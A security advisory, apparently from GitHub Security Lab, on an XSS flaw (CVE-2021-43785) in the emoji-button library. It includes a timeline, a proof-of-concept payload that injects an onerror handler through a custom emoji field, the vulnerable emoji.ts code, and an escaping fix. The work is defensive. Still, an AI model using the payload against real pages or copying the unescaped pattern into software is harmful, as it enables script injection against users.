Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted
- 2021-11-25: Maintainer acknowledged the issue
- 2021-11-25: Maintainer pushed a fix for the issue
- 2021-11-25: Maintainer published an advisory
Summary
emoji-button is prone to XSS when handling untrusted emojis.
Product
emoji-button
Tested Version
Details
Issue 1: XSS while handling emoji field (GHSL-2021-1043)
An attacker who is able to influence the emoji field when creating an EmojiButton instance can supply arbitrary HTML or JavaScript that is rendered in the context of the user's browser, leading to XSS.
Proof of concept snippet:
    import { EmojiButton } from '@joeattardi/emoji-button';

    const trigger = document.querySelector('#trigger');
    // The custom emoji's `emoji` field is interpolated unescaped into an <img src="..."> attribute.
    const picker = new EmojiButton({
      custom: [
        {
          name: 'XSS triggering emoji',
          emoji: '"> <img src="foobar" onerror="alert(1);" /> <',
        }
      ]
    });
    trigger.addEventListener('click', () => picker.togglePicker(trigger));
Vulnerable code: emoji.ts
    if (this.emoji.custom) {
      // `this.emoji.emoji` is inserted into the src attribute without any escaping.
      content = this.lazy
        ? smile
        : `<img class="${CLASS_CUSTOM_EMOJI}" src="${this.emoji.emoji}">`;
    }
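The following is an added example, not emoji-button's own code, that places the vulnerable string-interpolation pattern from emoji.ts beside a hardened renderer which escapes the attribute value before interpolation. The class name CLASS_CUSTOM_EMOJI is an assumed placeholder, and the sample payload is the one from the proof of concept above; the structural check isSingleImgTag is a constructed helper that flags markup where the emoji value has broken out of the src attribute.

```javascript
// Added example (not emoji-button's own code). CLASS_CUSTOM_EMOJI is an assumed
// placeholder value; the real constant lives in the library.
const CLASS_CUSTOM_EMOJI = 'emoji-picker__custom-emoji';

// Mirrors the vulnerable pattern: the emoji field lands in an attribute unescaped,
// so a value containing `">` terminates the attribute and the tag.
function renderCustomEmojiUnsafe(emoji) {
  return `<img class="${CLASS_CUSTOM_EMOJI}" src="${emoji.emoji}">`;
}

// Escape every character that can end an attribute value or open a new tag.
function escapeHtmlAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened renderer: the untrusted value is escaped before interpolation, so it
// stays inside the src attribute whatever it contains.
function renderCustomEmojiSafe(emoji) {
  return `<img class="${CLASS_CUSTOM_EMOJI}" src="${escapeHtmlAttribute(emoji.emoji)}">`;
}

// Constructed check: true only when the markup is exactly one <img> tag whose
// attribute values contain no raw quotes or angle brackets, i.e. nothing escaped.
function isSingleImgTag(html) {
  return /^<img(?: [a-z-]+="[^"<>]*")*>$/.test(html);
}

// Payload from the advisory's proof of concept.
const payload = {
  name: 'XSS triggering emoji',
  emoji: '"> <img src="foobar" onerror="alert(1);" /> <',
};

// Benign custom emoji, constructed for comparison.
const benign = { name: 'ok', emoji: 'https://example.com/a.png' };

console.log(renderCustomEmojiUnsafe(payload)); // second <img> with onerror escapes the attribute
console.log(renderCustomEmojiSafe(payload));   // one <img>, payload inert inside src
console.log(isSingleImgTag(renderCustomEmojiUnsafe(payload)), isSingleImgTag(renderCustomEmojiSafe(payload)));
```

In a browser the cleaner fix is to avoid markup strings entirely: create the element with document.createElement('img') and assign the value through img.src or setAttribute, which cannot produce a new tag regardless of the value's content. Escaping, as shown here, is the minimal change when the code must keep building an HTML string.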
Impact
This issue may lead to XSS.
Resources
CVE
- CVE-2021-43785
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-1043 in any communication regarding this issue.